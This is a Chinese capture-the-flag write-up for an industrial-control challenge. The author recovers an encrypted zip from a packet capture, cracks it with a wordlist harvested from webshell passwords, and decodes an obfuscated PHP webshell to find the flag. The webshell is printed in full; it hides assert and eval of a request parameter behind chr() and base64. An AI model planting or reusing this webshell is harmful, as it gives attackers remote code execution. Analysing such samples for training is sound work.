工控CTF_纵横网络靶场_隐藏的黑客

简介: 工控CTF_纵横网络靶场_隐藏的黑客

题目地址

https://game.fengtaisec.com/#/startQuestions/9

640.png


题目分析

根据情报得知工控现场发现某SCADA系统被黑客攻破,附件为黑客在目录留下的文件和当时时间段捕获到的一部分流量包,你能根据这些信息分析出蛛丝马迹来么flag形式为 flag{}。

关键字:捕获到的一部分流量包,你能根据这些信息分析    目录留下的文件


解题思路


下载文件,有一个upload目录 ,里面全是shell

640.png

640.png

还有一个流量包  打开

查找 flag、png、webshell等关键字,在查找webshell关键字时发现有个流量包里有个webshell.php,数据包里还有 pk开头的,说明存在zip文件

直接原始数据显示,将蓝色部分复制

076d660d6c29e78b6de1e2a149dcc453.png


使用010 Editor 新建一个16进制文件,将原始数据导入,保存为hack.zip文件

49444223f3b50cae4a53b5f94b2f9f1f.png

文件加密了需要解密,通过zip爆破工具进行暴力破解,爆破无果

upload目录下有很多php文件,获取upload文件中每个webshell的登陆密码进行爆破

python脚本收集脚本


import reimport os
passwd=[]s= os.listdir('./upload')for i in s:    f = open('upload/'+i,'r').read()    find=re.findall(r"\[(.*?)]",f)    find_1=' '.join(find)    passwd.append(find_1)p = open('passwd.txt', 'w')for lb in passwd:    p.write(lb + '\n')

得到密码文件

3d35ca6b082161dc66e74009589e66cf.png

使用zip爆破工具进行字典攻击 使用我们收集到的字典

85eece13b199b972c93445092d1cb534.png

爆破出解压密码为:7b8b965ad4bca

解压得到一个webshell.php,直接运行没有flag,需要进行审计


<?php error_reporting(0); @$c = array("1JFUVVFU1RbJzlhNzJjM","2Q1ZTc0ZjYwNTFiYjNiMzU","5MGZhOTMxOWZlJ10pOw","MGZhOTMxOWZlJ","MGZhOTMxOWZlJ");@$str="ZXZhbCgkX";@$o0o00o00o00o0o0 = chr(97).chr(115).chr(115).chr(101).chr(114).chr(116);#$o0o00o00o00o0o0 = assert@$ooo00o0o0o0o0o0 = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);#$ooo00o0o0o0o0o0 = base64_decode@$count = 0;for($x=0;$x<=9;$x++){#0,1,2        if (in_array($x, @$c)){                @$str=@$str.@$c[@$count];#拼接三次                if ($count == 2)#循环三次                {                               @$o0o00o00o00o0o0(@$ooo00o0o0o0o0o0(@$str));                        #assert(base64_decode(ZXZhbCgkX1JFUVVFU1RbJzlhNzJjM2Q1ZTc0ZjYwNTFiYjNiMzU5MGZhOTMxOWZlJ10pOw))                        #assert(base64_decode(eval($_REQUEST['9a72c3d5e74f6051bb3b3590fa9319fe']);))                }                @$count++;        }}?>

直接echo输出@$o0o00o00o00o0o0(@$ooo00o0o0o0o0o0(@$str))

得到


@assert(@base64_decode(@ZXZhbCgkX1JFUVVFU1RbJzlhNzJjM2Q1ZTc0ZjYwNTFiYjNiMzU5MGZhOTMxOWZlJ10pOw))

进行base64解密 得到flag

base64在线解密:https://www.qqxiuzi.cn/bianma/base64.htm

4ef523cb2db2c89cf8cc2dc9a7b8d21e.png


flag{9a72c3d5e74f6051bb3b3590fa9319fe}

相关文章
|
6月前
|
安全 算法 区块链
花无涯带你走进黑客世界之Tor洋葱网络
Tor本来是为用户提供匿名上网保护用户隐私的工具,但是对于一些用户来说,他们可以利用Tor的隐蔽性进行黑客攻击或非法交易活动。总结Tor的恶意应用主要表现在以下几方面。
206 0
|
6月前
|
存储 安全 测试技术
花无涯带你走进黑客世界之企业的网络攻防战
企业的网络攻防战无非就是白盒测试和黑盒测试, 只要攻击者信心坚定,没有什么密码是搞不到手的。不管头衔是白帽子、黑帽子,还是游走在中间的某种状态,大多数黑客都会同意没有攻不破的密码,或者是密码管理措施。不管他们的态度如何,是否尊重法律,企业如何做好攻防战,仅仅依靠第三方的公司是一定不够的
|
6月前
|
安全 数据安全/隐私保护
网络诈骗中的黑客手段
网络诈骗中的黑客手段
|
安全 Ubuntu Python
工控CTF_纵横网络靶场_恶意软件样本分析
工控CTF_纵横网络靶场_恶意软件样本分析
工控CTF_纵横网络靶场_恶意软件样本分析
|
数据采集 监控 数据管理
工控CTF_纵横网络靶场_组态软件分析
工控CTF_纵横网络靶场_组态软件分析
工控CTF_纵横网络靶场_组态软件分析
|
网络协议 PHP 网络架构
工控CTF_纵横网络靶场_S7COMM协议分析
工控CTF_纵横网络靶场_S7COMM协议分析
工控CTF_纵横网络靶场_S7COMM协议分析
|
算法 数据安全/隐私保护 Python
工控CTF_纵横网络靶场_奇怪的文件
工控CTF_纵横网络靶场_奇怪的文件
工控CTF_纵横网络靶场_奇怪的文件
|
运维 安全 BI
工控CTF_纵横网络靶场_简单流量分析
工控CTF_纵横网络靶场_简单流量分析
工控CTF_纵横网络靶场_简单流量分析
|
1月前
|
机器学习/深度学习 数据采集 人工智能
m基于深度学习网络的手势识别系统matlab仿真,包含GUI界面
m基于深度学习网络的手势识别系统matlab仿真,包含GUI界面
38 0
|
1月前
|
机器学习/深度学习 算法 计算机视觉
基于yolov2深度学习网络的火焰烟雾检测系统matlab仿真
基于yolov2深度学习网络的火焰烟雾检测系统matlab仿真